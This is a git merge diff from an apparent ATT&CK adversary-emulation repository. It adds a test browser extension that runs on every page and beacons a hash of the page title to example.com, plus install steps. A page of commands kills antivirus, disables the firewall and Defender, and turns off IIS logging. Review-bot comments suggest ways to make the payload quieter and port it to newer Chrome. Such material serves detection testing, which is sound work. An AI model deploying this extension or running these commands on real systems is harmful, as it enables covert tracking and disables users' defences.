Merge branch 'master' into master
commit
fb99ca3f6f
|
@ -0,0 +1,24 @@
|
|||
## Browser Extensions
|
||||
|
||||
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
|
||||
|
||||
|
||||
### Chrome (Developer Mode)
|
||||
|
||||
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
|
||||
|
||||
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
|
||||
|
||||
Then click 'Select'
|
||||
|
||||
### Chrome (Chrome Web Store)
|
||||
|
||||
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
|
||||
|
||||
### Firefox
|
||||
|
||||
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
|
||||
|
||||
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
|
||||
|
||||
Then click 'Open'
|
|
@ -0,0 +1,37 @@
|
|||
function exfil(str) {
|
||||
// take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
|
||||
// other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
|
||||
// and probably a thousand other methods. But this one is easy.
|
||||
var buffer = new TextEncoder("utf-8").encode(str);
|
||||
return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
|
||||
}
|
||||
|
||||
function callUrl(buffer) {
|
||||
// this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
|
||||
// except it's example.com so w/e
|
||||
var digest = hex(buffer);
|
||||
var url = "https://example.com/" + digest;
|
||||
console.log("Exfiltrating data to " + url)
|
||||
var xmlHttp = new XMLHttpRequest();
|
||||
xmlHttp.open( "GET", url, true);
|
||||
xmlHttp.send( null);
|
||||
return digest;
|
||||
}
|
||||
|
||||
function hex(buffer) {
|
||||
// nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
|
||||
var hexCodes = [];
|
||||
var view = new DataView(buffer);
|
||||
for (var i = 0; i < view.byteLength; i += 4) {
|
||||
var value = view.getUint32(i)
|
||||
var stringValue = value.toString(16)
|
||||
var padding = '00000000'
|
||||
var paddedValue = (padding + stringValue).slice(-padding.length)
|
||||
hexCodes.push(paddedValue);
|
||||
}
|
||||
var athing = hexCodes.join("");
|
||||
return hexCodes.join("");
|
||||
}
|
||||
|
||||
// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
|
||||
var digest = exfil(document.title);
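Review bot: `exfil` reads `crypto.subtle` with no guard, and this script is injected into every page (`<all_urls>` in the manifest); in Chrome the `SubtleCrypto` API is only exposed in secure contexts, so on a plain http:// page `crypto.subtle.digest` throws a TypeError on every load — loud for a test payload and an easy tell in the console. A guard at the top of `exfil`, `if (!window.crypto || !crypto.subtle) { return Promise.resolve(null); }`, keeps it quiet there (Firefox exposes `crypto.subtle` more broadly, so confirm the behaviour per browser). The promise returned on the final line also has no rejection handler, so a failed digest becomes an unhandled rejection; `exfil(document.title).catch(function (e) { console.log("exfil failed: " + e); });` is enough.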
|
|
@ -0,0 +1,16 @@
|
|||
{
|
||||
"name": "Minimum Viable Malicious Extension",
|
||||
"description": "Base Level Extension",
|
||||
"version": "1.0",
|
||||
"manifest_version": 2,
|
||||
"content_scripts": [
|
||||
{
|
||||
"matches": [
|
||||
"<all_urls>"
|
||||
],
|
||||
"js": [
|
||||
"inline.js"
|
||||
]
|
||||
}
|
||||
]
|
||||
}
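Review bot: The manifest declares no `permissions` block, yet `inline.js` beacons cross-origin to example.com from every page; as far as I can tell that works because a content script's XHR follows the host page's origin rules (a CORS "simple" GET whose response is opaque), so no host permission is needed for a one-way beacon. That is worth recording in the accompanying doc, since it is the detection-relevant property: the only install-time signal is the host-access warning that `"matches": ["<all_urls>"]` itself produces. Whether a host page's `connect-src` CSP blocks the request differs between Chrome and Firefox — confirm on both before relying on this as a test case.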
|
|
@ -0,0 +1,24 @@
|
|||
## Browser Extensions
|
||||
|
||||
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
|
||||
|
||||
|
||||
### Chrome (Developer Mode)
|
||||
|
||||
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
|
||||
|
||||
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
|
||||
|
||||
Then click 'Select'
|
||||
|
||||
### Chrome (Chrome Web Store)
|
||||
|
||||
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
|
||||
|
||||
### Firefox
|
||||
|
||||
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
|
||||
|
||||
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
|
||||
|
||||
Then click 'Open'
|
|
@ -4,14 +4,14 @@
|
|||
|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
|
||||
| [.bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Command-Line Interface](Execution/Command-Line_Interface.md) | Audio Capture | Automated Exfiltration | Commonly Used Port |
|
||||
| Bootkit | [Setuid and Setgid](Privilege_Escalation/Setuid_and_Setgid.md) | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | Data Compressed | Communication Through Removable Media |
|
||||
| [Cron Job](Persistence/Cron_Job.md) | Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | Clipboard Data | Data Encrypted | Connection Proxy |
|
||||
| Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol |
|
||||
| Rc.common | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data from Local System | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol |
|
||||
| Redundant Access | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding |
|
||||
| [Trap](Persistence/Trap.md) | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation |
|
||||
| Valid Accounts | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Input Capture | Exfiltration Over Physical Medium | Fallback Channels |
|
||||
| Web Shell | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Screen Capture | Scheduled Transfer | Multi-Stage Channels |
|
||||
| | | Install Root Certificate | | System Owner/User Discovery | | | | | Multiband Communication |
|
||||
| [Browser Extensions](Persistence/Browser_Extensions.md)| Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy |
|
||||
| [Cron Job](Persistence/Cron_Job.md) | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Clipboard Data | Data Transfer Size Limits | Custom Command and Control Protocol |
|
||||
| Hidden Files and Directories | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data Staged | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol |
|
||||
| Rc.common | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding |
|
||||
| Redundant Access | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation |
|
||||
| [Trap](Persistence/Trap.md) | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Data from Removable Media | Exfiltration Over Physical Medium | Fallback Channels |
|
||||
| Valid Accounts | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Input Capture | Scheduled Transfer | Multi-Stage Channels |
|
||||
| Web Shell | | Install Root Certificate | | System Owner/User Discovery | | | Screen Capture | | Multiband Communication |
|
||||
| | | Masquerading | | | | | | | Multilayer Encryption |
|
||||
| | | Redundant Access | | | | | | | Remote File Copy |
|
||||
| | | Scripting | | | | | | | Standard Application Layer Protocol |
|
||||
|
|
|
@ -0,0 +1,24 @@
|
|||
## Browser Extensions
|
||||
|
||||
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
|
||||
|
||||
|
||||
### Chrome (Developer Mode)
|
||||
|
||||
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
|
||||
|
||||
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
|
||||
|
||||
Then click 'Select'
|
||||
|
||||
### Chrome (Chrome Web Store)
|
||||
|
||||
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
|
||||
|
||||
### Firefox
|
||||
|
||||
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
|
||||
|
||||
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
|
||||
|
||||
Then click 'Open'
|
|
@ -0,0 +1,37 @@
|
|||
function exfil(str) {
|
||||
// take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
|
||||
// other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
|
||||
// and probably a thousand other methods. But this one is easy.
|
||||
var buffer = new TextEncoder("utf-8").encode(str);
|
||||
return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
|
||||
}
|
||||
|
||||
function callUrl(buffer) {
|
||||
// this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
|
||||
// except it's example.com so w/e
|
||||
var digest = hex(buffer);
|
||||
var url = "https://example.com/" + digest;
|
||||
console.log("Exfiltrating data to " + url)
|
||||
var xmlHttp = new XMLHttpRequest();
|
||||
xmlHttp.open( "GET", url, true);
|
||||
xmlHttp.send( null);
|
||||
return digest;
|
||||
}
|
||||
|
||||
function hex(buffer) {
|
||||
// nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
|
||||
var hexCodes = [];
|
||||
var view = new DataView(buffer);
|
||||
for (var i = 0; i < view.byteLength; i += 4) {
|
||||
var value = view.getUint32(i)
|
||||
var stringValue = value.toString(16)
|
||||
var padding = '00000000'
|
||||
var paddedValue = (padding + stringValue).slice(-padding.length)
|
||||
hexCodes.push(paddedValue);
|
||||
}
|
||||
var athing = hexCodes.join("");
|
||||
return hexCodes.join("");
|
||||
}
|
||||
|
||||
// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
|
||||
var digest = exfil(document.title);
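Review bot: The header comment in `exfil` should say plainly that only SHA-256(title) leaves the browser — the receiving server cannot recover the title, so this demonstrates the beacon/C2 channel and the persistence mechanism, not data theft, and anyone using it as a detection test needs that distinction. Add above `function exfil`: `// NOTE: only the hex SHA-256 of the string is sent; the receiver cannot recover the plaintext.` The module-level `var digest = exfil(document.title);` holds a Promise, not a digest, so `var pending = exfil(document.title);` would be a less misleading name, and `var athing = hexCodes.join("");` in `hex` is dead and can be dropped. `callUrl` also fires the XHR with no `onerror`/`onload`, which is fine for a beacon but worth a `// fire-and-forget; response is never read` comment so nobody adds response handling expecting readable data.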
|
|
@ -0,0 +1,16 @@
|
|||
{
|
||||
"name": "Minimum Viable Malicious Extension",
|
||||
"description": "Base Level Extension",
|
||||
"version": "1.0",
|
||||
"manifest_version": 2,
|
||||
"content_scripts": [
|
||||
{
|
||||
"matches": [
|
||||
"<all_urls>"
|
||||
],
|
||||
"js": [
|
||||
"inline.js"
|
||||
]
|
||||
}
|
||||
]
|
||||
}
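Review bot: `"manifest_version": 2` is the part of this file most likely to rot — Chrome has been phasing out MV2 (the Web Store no longer accepts new MV2 items and recent Chrome builds disable MV2 extensions), so the "Load unpacked" and Web Store steps in the accompanying doc may fail against a current Chrome; confirm against the version you test with and note it in the README. The port is small for this payload: `"manifest_version": 3` — the `content_scripts` syntax used here is unchanged between MV2 and MV3. The Firefox "Load Temporary Add-on" path still accepts MV2, so the two browser paths may diverge.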
|
|
@ -0,0 +1,24 @@
|
|||
## Browser Extensions
|
||||
|
||||
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
|
||||
|
||||
|
||||
### Chrome (Developer Mode)
|
||||
|
||||
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
|
||||
|
||||
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
|
||||
|
||||
Then click 'Select'
|
||||
|
||||
### Chrome (Chrome Web Store)
|
||||
|
||||
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
|
||||
|
||||
### Firefox
|
||||
|
||||
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
|
||||
|
||||
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
|
||||
|
||||
Then click 'Open'
|
|
@ -3,7 +3,7 @@
|
|||
| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
|
||||
|------------------------------|-------------------------------|---------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
|
||||
| [.bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Dylib Hijacking | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | [AppleScript](Execution/AppleScript.md) | [AppleScript](Execution/AppleScript.md) | Audio Capture | Automated Exfiltration | Commonly Used Port |
|
||||
| Browser Extensions | Exploitation of Vulnerability | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Automated Collection | Data Compressed | Communication Through Removable Media |
|
||||
| [Browser Extensions](Persistence/Browser_Extensions.md) | Exploitation of Vulnerability | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Automated Collection | Data Compressed | Communication Through Removable Media |
|
||||
| [Create Account](Persistence/Create_Account.md) | Launch Daemon | Code Signing | Credentials in Files | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | Browser Extensions | Data Encrypted | Connection Proxy |
|
||||
| Dylib Hijacking | Plist Modification | [Disabling Security Tools](Defense_Evasion/Disabling_Security_Tools.md) | Exploitation of Vulnerability | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | [Logon Scripts](Persistence/Logon_Scripts.md) | Launchctl | Clipboard Data | Data Transfer Size Limits | [Custom Command and Control Protocol](Command_and_Control/Custom_Command_and_Control_Protocol.md) |
|
||||
| Hidden Files and Directories | Process Injection | Exploitation of Vulnerability | Input Capture | [Network Share Discovery](Discovery/Network_Share_Discovery.md) | Remote File Copy | Local Job Scheduling | Data Staged | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol |
|
||||
|
|
|
@ -0,0 +1,24 @@
|
|||
## Browser Extensions
|
||||
|
||||
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
|
||||
|
||||
|
||||
### Chrome (Developer Mode)
|
||||
|
||||
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
|
||||
|
||||
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
|
||||
|
||||
Then click 'Select'
|
||||
|
||||
### Chrome (Chrome Web Store)
|
||||
|
||||
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
|
||||
|
||||
### Firefox
|
||||
|
||||
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
|
||||
|
||||
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
|
||||
|
||||
Then click 'Open'
|
|
@ -0,0 +1,28 @@
|
|||
# Disabling Security Tools
|
||||
|
||||
MITRE ATT&CK Technique: [T1089](https://attack.mitre.org/wiki/Technique/T1089)
|
||||
|
||||
## Terminate Anti-Virus Processes
|
||||
`Taskkill /F /IM avprocess.exe`
|
||||
|
||||
## Disable Firewall
|
||||
`netsh firewall set opmode disable`
|
||||
|
||||
## Stop Windows Security Center
|
||||
`net stop wscsvc`
|
||||
|
||||
## Stop Windows Defender
|
||||
|
||||
### Windows 7/8
|
||||
`net stop windefend`
|
||||
|
||||
### Windows 10
|
||||
`PS > Set-MpPreference -DisableRealtimeMonitoring $true`
|
||||
|
||||
## Disable Default Web Site Logging IIS 7
|
||||
|
||||
### Disable Default Web Site Logging IIS 7
|
||||
`%windir%\system32\inetsrv\appcmd.exe set config "Default Web Site" -section:system.webServer/httpLogging /dontLog:"True" /commit:apphost`
|
||||
|
||||
### Restart Default Web Site IIS 7
|
||||
`%windir%\system32\inetsrv\appcmd.exe stop site /site.name:"Default Web Site" && %windir%\system32\inetsrv\appcmd.exe start site /site.name:"Default Web Site"`
|
|
@ -0,0 +1,37 @@
|
|||
function exfil(str) {
|
||||
// take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
|
||||
// other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
|
||||
// and probably a thousand other methods. But this one is easy.
|
||||
var buffer = new TextEncoder("utf-8").encode(str);
|
||||
return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
|
||||
}
|
||||
|
||||
function callUrl(buffer) {
|
||||
// this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
|
||||
// except it's example.com so w/e
|
||||
var digest = hex(buffer);
|
||||
var url = "https://example.com/" + digest;
|
||||
console.log("Exfiltrating data to " + url)
|
||||
var xmlHttp = new XMLHttpRequest();
|
||||
xmlHttp.open( "GET", url, true);
|
||||
xmlHttp.send( null);
|
||||
return digest;
|
||||
}
|
||||
|
||||
function hex(buffer) {
|
||||
// nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
|
||||
var hexCodes = [];
|
||||
var view = new DataView(buffer);
|
||||
for (var i = 0; i < view.byteLength; i += 4) {
|
||||
var value = view.getUint32(i)
|
||||
var stringValue = value.toString(16)
|
||||
var padding = '00000000'
|
||||
var paddedValue = (padding + stringValue).slice(-padding.length)
|
||||
hexCodes.push(paddedValue);
|
||||
}
|
||||
var athing = hexCodes.join("");
|
||||
return hexCodes.join("");
|
||||
}
|
||||
|
||||
// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
|
||||
var digest = exfil(document.title);
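Review bot: `hex` carries a dead local (`var athing = hexCodes.join("");`) and a `DataView`/`getUint32` loop that only works because every WebCrypto digest length happens to be a multiple of 4; a byte-wise form has no such assumption and reads at a glance: `return Array.from(new Uint8Array(buffer), function (b) { return ("0" + b.toString(16)).slice(-2); }).join("");`. Output is identical for SHA-256 (64 lowercase hex characters). Separately, the label argument to `new TextEncoder("utf-8")` has, as far as I know, been removed from the spec and is ignored by current browsers, so `new TextEncoder()` is the current form.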
|
|
@ -0,0 +1,16 @@
|
|||
{
|
||||
"name": "Minimum Viable Malicious Extension",
|
||||
"description": "Base Level Extension",
|
||||
"version": "1.0",
|
||||
"manifest_version": 2,
|
||||
"content_scripts": [
|
||||
{
|
||||
"matches": [
|
||||
"<all_urls>"
|
||||
],
|
||||
"js": [
|
||||
"inline.js"
|
||||
]
|
||||
}
|
||||
]
|
||||
}
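Review bot: Nothing in the manifest marks this as a detection-test artifact — `"description": "Base Level Extension"` says nothing, and strict JSON cannot carry comments, so the description is the only place to put it. Suggest `"description": "Benign detection-test extension: beacons SHA-256(document.title) to example.com on every page load"`. That matches the name, and makes the purpose obvious to an analyst who finds it installed while triaging chrome://extensions or about:debugging.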
|
|
@ -0,0 +1,24 @@
|
|||
## Browser Extensions
|
||||
|
||||
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
|
||||
|
||||
|
||||
### Chrome (Developer Mode)
|
||||
|
||||
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
|
||||
|
||||
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
|
||||
|
||||
Then click 'Select'
|
||||
|
||||
### Chrome (Chrome Web Store)
|
||||
|
||||
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
|
||||
|
||||
### Firefox
|
||||
|
||||
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
|
||||
|
||||
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
|
||||
|
||||
Then click 'Open'
|
|
@ -4,14 +4,14 @@
|
|||
|-------------------------------------------------------|----------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
|
||||
| [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | [Account Manipulation](Credential_Access/Account_Manipulation.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | Command-Line Interface | [Audio Capture](Collection/Audio_Capture.md) | Automated Exfiltration | Commonly Used Port |
|
||||
| AppCert DLLs | Accessibility Features | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Distributed Component Object Model | Dynamic Data Exchange | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media |
|
||||
| [AppInit DLLs](Persistence/AppInit_DLLs.md) | AppCert DLLs | Bypass User Account Control | [Credential Dumping](Credential_Access/Credential_Dumping.md) | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Execution through API | Browser Extensions | Data Encrypted | Connection Proxy |
|
||||
| [AppInit DLLs](Persistence/AppInit_DLLs.md) | AppCert DLLs | Bypass User Account Control | [Credential Dumping](Credential_Access/Credential_Dumping.md) | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Execution through API | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy |
|
||||
| [Application Shimming](Persistence/Application_Shimming.md) | AppInit DLLs | Code Signing | [Credentials in Files](Credential_Access/Credentials_in_Files.md) | Network Service Scanning | Logon Scripts | Execution through Module Load | [Clipboard Data](Collection/Clipboard_Data.md) | Data Transfer Size Limits | Custom Command and Control Protocol |
|
||||
| [Authentication Package](Persistence/Authentication_Package.md) | Application Shimming | Component Firmware | Exploitation of Vulnerability | Network Share Discovery | Pass the Hash | Graphical User Interface | Data Staged | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
|
||||
| Bootkit | [Bypass User Account Control](Privilege_Escalation/Bypass_User_Account_Control.md) | Component Object Model Hijacking | Forced Authentication | Peripheral Device Discovery | Pass the Ticket | [InstallUtil](Execution/InstallUtil.md) | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding |
|
||||
| Browser Extensions | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation |
|
||||
| [Browser Extensions](Persistence/Browser_Extensions.md) | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation |
|
||||
| [Change Default File Association](Persistence/Change_Default_File_Association.md) | Exploitation of Vulnerability | DLL Side-Loading | [Input Capture](Collection/Input_Capture.md) | Process Discovery | Remote File Copy | [Mshta](Execution/Mshta.md) | Data from Removable Media | Exfiltration Over Physical Medium | Domain Fronting |
|
||||
| Component Firmware | Extra Window Memory Injection | [Deobfuscate/Decode Files or Information](Defense_Evasion/Deobfuscate_Decode_Files_Or_Information.md) | LLMNR/NBT-NS Poisoning | [Query Registry](Discovery/Query_Registry.md) | Remote Services | [PowerShell](Execution/PowerShell.md) | Email Collection | Scheduled Transfer | Fallback Channels |
|
||||
| [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | File System Permissions Weakness | Disabling Security Tools | Network Sniffing | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | | Multi-Stage Channels |
|
||||
| [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | File System Permissions Weakness | [Disabling Security Tools](Defense_Evasion/Disabling_Security_Tools.md) | Network Sniffing | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | | Multi-Stage Channels |
|
||||
| [Create Account](Credential_Access/Create_Account.md) | Hooking | Exploitation of Vulnerability | Password Filter DLL | [Security Software Discovery](Discovery/Security_Software_Discovery.md) | Shared Webroot | [Regsvr32](Execution/Regsvr32.md) | Man in the Browser | | Multi-hop Proxy |
|
||||
| DLL Search Order Hijacking | Image File Execution Options Injection | Extra Window Memory Injection | Private Keys | [System Information Discovery](Discovery/System_Information_Discovery.md) | Taint Shared Content | [Rundll32](Execution/rundll32.md) | Screen Capture | | Multiband Communication |
|
||||
| External Remote Services | [New Service](Persistence/New_Service.md) | [File Deletion](Defense_Evasion/File_Deletion.md) | Replication Through Removable Media | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | Third-party Software | Scheduled Task | Video Capture | | Multilayer Encryption |
|
||||
|
|